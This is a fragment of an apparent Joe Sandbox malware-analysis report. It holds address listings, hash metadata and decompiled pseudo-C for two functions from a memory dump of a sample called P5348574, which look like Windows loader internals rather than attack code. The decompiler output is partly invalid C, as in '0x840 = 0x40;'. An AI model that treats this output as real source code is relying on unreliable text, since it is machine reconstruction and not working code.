                                                    0x017c8711
                                                    0x017c8725
                                                    0x017c8727
                                                    0x017c872a
                                                    0x017c872c
                                                    0x01819af0
                                                    0x01819af5
                                                    0x017c8732
                                                    0x017c8732
                                                    0x017c8732
                                                    0x017c8735
                                                    0x017c8737
                                                    0x017c8515
                                                    0x017c8515
                                                    0x017c8518
                                                    0x017c851d
                                                    0x017c8523
                                                    0x017c8527
                                                    0x017c852b
                                                    0x017c8537
                                                    0x017c8539
                                                    0x017c853c
                                                    0x017c853e
                                                    0x017c868c
                                                    0x017c8691
                                                    0x017c8699
                                                    0x017c869b
                                                    0x017c8744
                                                    0x017c8748
                                                    0x017c86a1
                                                    0x017c86a1
                                                    0x017c86a1
                                                    0x017c86a4
                                                    0x017c86a8
                                                    0x01819bdf
                                                    0x01819bdf
                                                    0x017c86ae
                                                    0x017c86b0
                                                    0x00000000
                                                    0x017c86b6
                                                    0x00000000
                                                    0x01819be9
                                                    0x017c86b0
                                                    0x017c8544
                                                    0x017c854a
                                                    0x017c854d
                                                    0x017c8551
                                                    0x017c876e
                                                    0x017c8778
                                                    0x017c877b
                                                    0x017c8780
                                                    0x017c8557
                                                    0x017c8557
                                                    0x017c855d
                                                    0x017c855d
                                                    0x017c856b
                                                    0x017c856e
                                                    0x017c8570
                                                    0x017c8573
                                                    0x017c8576
                                                    0x017c8576
                                                    0x017c8579
                                                    0x017c857b
                                                    0x00000000
                                                    0x00000000
                                                    0x017c8581
                                                    0x017c85a0
                                                    0x017c85a2
                                                    0x017c85a5
                                                    0x017c85a7
                                                    0x01819b1b
                                                    0x01819b1b
                                                    0x017c862e
                                                    0x017c862e
                                                    0x017c8631
                                                    0x017c8631
                                                    0x017c8634
                                                    0x017c8636
                                                    0x017c8669
                                                    0x017c8669
                                                    0x017c866b
                                                    0x01819bbf
                                                    0x01819bc4
                                                    0x01819bc8
                                                    0x01819bce
                                                    0x01819bce
                                                    0x017c8671
                                                    0x017c8671
                                                    0x017c8674
                                                    0x017c8676
                                                    0x01819bae
                                                    0x01819bae
                                                    0x017c8676
                                                    0x017c867c
                                                    0x017c867e
                                                    0x017c8688
                                                    0x017c8688
                                                    0x00000000
                                                    0x017c867e
                                                    0x017c8638
                                                    0x017c8638
                                                    0x017c863b
                                                    0x017c863e
                                                    0x017c863f
                                                    0x017c8642
                                                    0x017c8645
                                                    0x017c8648
                                                    0x017c864d
                                                    0x01819b69
                                                    0x01819b6e
                                                    0x01819b7b
                                                    0x01819b81
                                                    0x01819b85
                                                    0x01819b89
                                                    0x01819ba7
                                                    0x01819b8b
                                                    0x01819b91
                                                    0x01819b9a
                                                    0x01819b9f
                                                    0x01819b9f
                                                    0x017c8788
                                                    0x017c878d
                                                    0x017c8763
                                                    0x017c8763
                                                    0x017c8766
                                                    0x00000000
                                                    0x017c8766
                                                    0x01819b70
                                                    0x00000000
                                                    0x01819b70
                                                    0x017c8656
                                                    0x017c865a
                                                    0x017c865c
                                                    0x017c8752
                                                    0x017c8756
                                                    0x00000000
                                                    0x00000000
                                                    0x017c875e
                                                    0x00000000
                                                    0x017c875e
                                                    0x017c8662
                                                    0x017c8662
                                                    0x017c8662
                                                    0x017c8666
                                                    0x00000000
                                                    0x017c8666
                                                    0x017c85b7
                                                    0x017c85b9
                                                    0x017c85bc
                                                    0x017c85bf
                                                    0x017c85cc
                                                    0x017c85d1
                                                    0x017c85d4
                                                    0x017c85db
                                                    0x017c85de
                                                    0x017c85e0
                                                    0x01819b5f
                                                    0x00000000
                                                    0x01819b5f
                                                    0x017c85e6
                                                    0x017c85ea
                                                    0x017c86c3
                                                    0x017c86c5
                                                    0x017c86c8
                                                    0x017c86ca
                                                    0x01819b16
                                                    0x00000000
                                                    0x01819b16
                                                    0x017c86d6
                                                    0x017c85f6
                                                    0x017c85f6
                                                    0x017c85f9
                                                    0x017c8602
                                                    0x017c8606
                                                    0x017c860a
                                                    0x017c860b
                                                    0x017c860e
                                                    0x017c8611
                                                    0x00000000
                                                    0x017c8611
                                                    0x017c85f3
                                                    0x00000000
                                                    0x017c85f3
                                                    0x017c8619
                                                    0x017c861e
                                                    0x017c861e
                                                    0x017c8621
                                                    0x017c8622
                                                    0x017c8623
                                                    0x017c8625
                                                    0x017c862c
                                                    0x00000000
                                                    0x017c873d
                                                    0x00000000
                                                    0x017c873d
                                                    0x017c8737
                                                    0x017c850f
                                                    0x017c8512
                                                    0x00000000
                                                    0x017c8512
                                                    0x00000000
                                                    0x017c84d6

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47a39f92ea741773c04266f2e1d9649eec659bd04199e5207af2cd136ea5b10e
                                                    • Instruction ID: 6eededece7ddf08f559583de86ce4a16741dd1860c7da7f30c54f6ed5eaa2731
                                                    • Opcode Fuzzy Hash: 47a39f92ea741773c04266f2e1d9649eec659bd04199e5207af2cd136ea5b10e
                                                    • Instruction Fuzzy Hash: DAB15BB1E00219DFDB15DFE8C984AADFBB9BF48704F10412EE505AB34AD770AA41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E513A Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E017E513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x18ad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E017FD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E017D2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L017D4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E017FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E017CFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x18ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E017FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                    0x017e5142
                                                    0x017e514c
                                                    0x017e5150
                                                    0x017e5157
                                                    0x017e5159
                                                    0x017e515e
                                                    0x017e5165
                                                    0x017e5169
                                                    0x017e516c
                                                    0x017e5172
                                                    0x017e5176
                                                    0x017e517a
                                                    0x017e517a
                                                    0x017e517a
                                                    0x017e517f
                                                    0x01826d8b
                                                    0x01826d8e
                                                    0x01826d91
                                                    0x01826d95
                                                    0x01826d98
                                                    0x01826d9c
                                                    0x01826da0
                                                    0x01826da3
                                                    0x01826da7
                                                    0x01826e26
                                                    0x01826e26
                                                    0x01826e2a
                                                    0x017e51f9
                                                    0x017e51f9
                                                    0x017e51fe
                                                    0x01826e33
                                                    0x01826e33
                                                    0x01826e39
                                                    0x01826e3d
                                                    0x01826e46
                                                    0x01826e50
                                                    0x00000000
                                                    0x00000000
                                                    0x01826e52
                                                    0x01826e53
                                                    0x01826e56
                                                    0x01826e5d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01826e5f
                                                    0x01826e67
                                                    0x01826e77
                                                    0x01826e7f
                                                    0x01826e80
                                                    0x01826e88
                                                    0x01826e90
                                                    0x01826e9f
                                                    0x01826ea5
                                                    0x01826ea9
                                                    0x01826eb1
                                                    0x01826ebf
                                                    0x00000000
                                                    0x00000000
                                                    0x01826ecf
                                                    0x01826ed3
                                                    0x00000000
                                                    0x00000000
                                                    0x01826edb
                                                    0x01826ede
                                                    0x01826ee1
                                                    0x01826ee8
                                                    0x01826eeb
                                                    0x01826eed
                                                    0x01826ef0
                                                    0x01826ef4
                                                    0x01826ef8
                                                    0x01826efc
                                                    0x00000000
                                                    0x00000000
                                                    0x01826f0d
                                                    0x01826f11
                                                    0x01826f32
                                                    0x01826f37
                                                    0x01826f3b
                                                    0x01826f3e
                                                    0x01826f41
                                                    0x01826f46
                                                    0x00000000
                                                    0x00000000
                                                    0x01826f4c
                                                    0x01826f50
                                                    0x01826f50
                                                    0x01826f54
                                                    0x01826f62
                                                    0x01826f65
                                                    0x01826f6d
                                                    0x01826f7b
                                                    0x01826f7b
                                                    0x01826f93
                                                    0x01826f98
                                                    0x01826fa0
                                                    0x01826fa6
                                                    0x01826fb3
                                                    0x01826fb6
                                                    0x01826fbf
                                                    0x01826fc1
                                                    0x01826fd5
                                                    0x01826fda
                                                    0x01826fda
                                                    0x01826fdd
                                                    0x01826fe2
                                                    0x01826fe7
                                                    0x01826feb
                                                    0x01826fef
                                                    0x01826ff3
                                                    0x017e520c
                                                    0x017e520c
                                                    0x017e520f
                                                    0x017e5215
                                                    0x017e5234
                                                    0x017e523a
                                                    0x017e523a
                                                    0x017e5244
                                                    0x017e5245
                                                    0x017e5246
                                                    0x017e5251
                                                    0x017e5251
                                                    0x01826f13
                                                    0x01826f17
                                                    0x01826f17
                                                    0x01826f18
                                                    0x01826f1b
                                                    0x01826f1f
                                                    0x01826f23
                                                    0x00000000
                                                    0x01826f28
                                                    0x017e5204
                                                    0x017e5204
                                                    0x017e5208
                                                    0x00000000
                                                    0x017e5208
                                                    0x017e5185
                                                    0x017e5188
                                                    0x017e518a
                                                    0x017e518e
                                                    0x017e5195
                                                    0x01826db1
                                                    0x01826db5
                                                    0x01826db9
                                                    0x017e519b
                                                    0x017e519b
                                                    0x017e519e
                                                    0x017e51a7
                                                    0x017e51a9
                                                    0x017e51a9
                                                    0x017e51b5
                                                    0x017e51b8
                                                    0x017e51bb
                                                    0x017e51be
                                                    0x017e51c1
                                                    0x017e51c5
                                                    0x017e51c9
                                                    0x017e51cd
                                                    0x017e51cd
                                                    0x017e51d8
                                                    0x017e51dc
                                                    0x017e51e0
                                                    0x01826dcc
                                                    0x01826dd0
                                                    0x01826dd5
                                                    0x01826ddd
                                                    0x01826de1
                                                    0x01826de1
                                                    0x01826de5
                                                    0x01826deb
                                                    0x01826df1
                                                    0x01826df7
                                                    0x01826dfd
                                                    0x01826e01
                                                    0x01826e05
                                                    0x01826e09
                                                    0x01826e0d
                                                    0x01826e11
                                                    0x01826e11
                                                    0x017e51eb
                                                    0x01826e1a
                                                    0x01826e1f
                                                    0x01826e21
                                                    0x01826e23
                                                    0x00000000
                                                    0x017e51f1
                                                    0x017e51f1
                                                    0x00000000
                                                    0x017e51f1

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd1a46c2a53d11a8c2b8a21fc561cdfafe100a1ec47012152d596fc99eac0c04
                                                    • Instruction ID: a04eeabe242b3602bc253a2c387392d0729c27c90b2205c2376f05eeb7941d04
                                                    • Opcode Fuzzy Hash: dd1a46c2a53d11a8c2b8a21fc561cdfafe100a1ec47012152d596fc99eac0c04
                                                    • Instruction Fuzzy Hash: 2EC113755083818FD355CF28C580A6AFBF1BF88308F244A6EF9998B352D771E985CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017E03E2 Relevance: .3, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E017E03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x18ad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E017E0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E017FB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E017CB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x18a7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E017D7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E017D7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01837016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E017F9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E018369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x18a7c04 != 0) {
						_t118 = _v12;
						_t120 = E0183A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x18a7bd8;
						if( *0x18a7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E017F95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E017F99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01833540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E017BB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E017FAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x18a8474 - 3;
										if( *0x18a8474 != 3) {
											 *0x18a79dc =  *0x18a79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E017D7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E017D7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01837016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x18a8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x18a7b00; // 0x0
							asm("ror esi, cl");
							 *0x18ab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E017F95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E017C7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                    0x017e03f1
                                                    0x017e03f7
                                                    0x017e03f9
                                                    0x017e03fb
                                                    0x017e03fd
                                                    0x017e0400
                                                    0x017e040a
                                                    0x01824c7a
                                                    0x017e0537
                                                    0x017e0547
                                                    0x017e0410
                                                    0x017e0410
                                                    0x017e0414
                                                    0x017e0417
                                                    0x017e041a
                                                    0x017e0421
                                                    0x017e0424
                                                    0x017e042b
                                                    0x017e043b
                                                    0x017e043e
                                                    0x017e043f
                                                    0x017e043f
                                                    0x017e0446
                                                    0x017e0449
                                                    0x017e044c
                                                    0x017e044f
                                                    0x017e0459
                                                    0x01824c8d
                                                    0x017e045f
                                                    0x017e045f
                                                    0x017e045f
                                                    0x017e0467
                                                    0x01824c97
                                                    0x01824c9d
                                                    0x01824ca4
                                                    0x01824caa
                                                    0x01824caf
                                                    0x01824cb1
                                                    0x01824cc3
                                                    0x01824cb3
                                                    0x01824cbc
                                                    0x01824cbc
                                                    0x01824cc8
                                                    0x01824ccb
                                                    0x01824cd7
                                                    0x01824cda
                                                    0x01824cdf
                                                    0x01824cdf
                                                    0x01824ccb
                                                    0x01824ca4
                                                    0x017e046d
                                                    0x017e046f
                                                    0x017e046f
                                                    0x017e0471
                                                    0x017e0476
                                                    0x017e047a
                                                    0x017e047b
                                                    0x017e0483
                                                    0x017e0489
                                                    0x017e048d
                                                    0x00000000
                                                    0x00000000
                                                    0x01824ce9
                                                    0x01824cef
                                                    0x01824d22
                                                    0x01824d22
                                                    0x00000000
                                                    0x01824d22
                                                    0x01824cf1
                                                    0x01824cf7
                                                    0x00000000
                                                    0x00000000
                                                    0x01824cf9
                                                    0x01824cff
                                                    0x00000000
                                                    0x00000000
                                                    0x01824d05
                                                    0x01824d07
                                                    0x00000000
                                                    0x00000000
                                                    0x01824d0d
                                                    0x01824d0f
                                                    0x01824d14
                                                    0x01824d16
                                                    0x00000000
                                                    0x00000000
                                                    0x01824d1c
                                                    0x01824d1c
                                                    0x017e0499
                                                    0x017e0535
                                                    0x017e0535
                                                    0x00000000
                                                    0x017e0535
                                                    0x017e04a6
                                                    0x01824d2c
                                                    0x01824d37
                                                    0x01824d39
                                                    0x01824d3b
                                                    0x00000000
                                                    0x00000000
                                                    0x01824d41
                                                    0x01824d48
                                                    0x017e0527
                                                    0x017e052b
                                                    0x017e052d
                                                    0x017e0530
                                                    0x017e0530
                                                    0x00000000
                                                    0x017e052b
                                                    0x01824d4e
                                                    0x017e04ac
                                                    0x017e04ac
                                                    0x017e04af
                                                    0x017e04b2
                                                    0x017e04b7
                                                    0x017e04b9
                                                    0x017e04bb
                                                    0x017e04bd
                                                    0x017e04bf
                                                    0x017e04c5
                                                    0x017e04c9
                                                    0x01824d53
                                                    0x01824d59
                                                    0x01824db9
                                                    0x01824dba
                                                    0x01824dbf
                                                    0x01824dc2
                                                    0x01824dc4
                                                    0x01824dc7
                                                    0x01824dce
                                                    0x00000000
                                                    0x01824dce
                                                    0x01824d5b
                                                    0x01824d61
                                                    0x00000000
                                                    0x00000000
                                                    0x01824d63
                                                    0x01824d69
                                                    0x00000000
                                                    0x00000000
                                                    0x01824d6b
                                                    0x01824d6e
                                                    0x01824d74
                                                    0x01824d76
                                                    0x01824d7c
                                                    0x01824d7e
                                                    0x01824d84
                                                    0x01824d89
                                                    0x01824d8c
                                                    0x01824d8d
                                                    0x01824d92
                                                    0x01824d95
                                                    0x01824d96
                                                    0x01824d98
                                                    0x01824d9a
                                                    0x01824d9f
                                                    0x01824da4
                                                    0x01824da6
                                                    0x01824da8
                                                    0x01824daf
                                                    0x01824db1
                                                    0x01824db1
                                                    0x01824daf
                                                    0x01824da6
                                                    0x01824d84
                                                    0x01824d7c
                                                    0x00000000
                                                    0x01824d74
                                                    0x017e04d6
                                                    0x01824de1
                                                    0x017e04dc
                                                    0x017e04dc
                                                    0x017e04dc
                                                    0x017e04e4
                                                    0x01824deb
                                                    0x01824df1
                                                    0x01824df8
                                                    0x01824dfe
                                                    0x01824e03
                                                    0x01824e05
                                                    0x01824e17
                                                    0x01824e07
                                                    0x01824e10
                                                    0x01824e10
                                                    0x01824e1c
                                                    0x01824e1f
                                                    0x01824e35
                                                    0x01824e35
                                                    0x01824e1f
                                                    0x01824df8
                                                    0x017e04f1
                                                    0x017e04fa
                                                    0x01824e3f
                                                    0x01824e47
                                                    0x01824e5b
                                                    0x01824e61
                                                    0x01824e67
                                                    0x01824e69
                                                    0x01824e71
                                                    0x01824e73
                                                    0x017e0500
                                                    0x017e0500
                                                    0x017e0500
                                                    0x017e04fa
                                                    0x017e0508
                                                    0x017e051d
                                                    0x017e051d
                                                    0x017e051f
                                                    0x017e0524
                                                    0x00000000
                                                    0x017e0524
                                                    0x017e0515
                                                    0x017e0517
                                                    0x01824e7a
                                                    0x01824e7c
                                                    0x00000000
                                                    0x00000000
                                                    0x01824e85
                                                    0x00000000
                                                    0x01824e85
                                                    0x00000000
                                                    0x017e0517

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
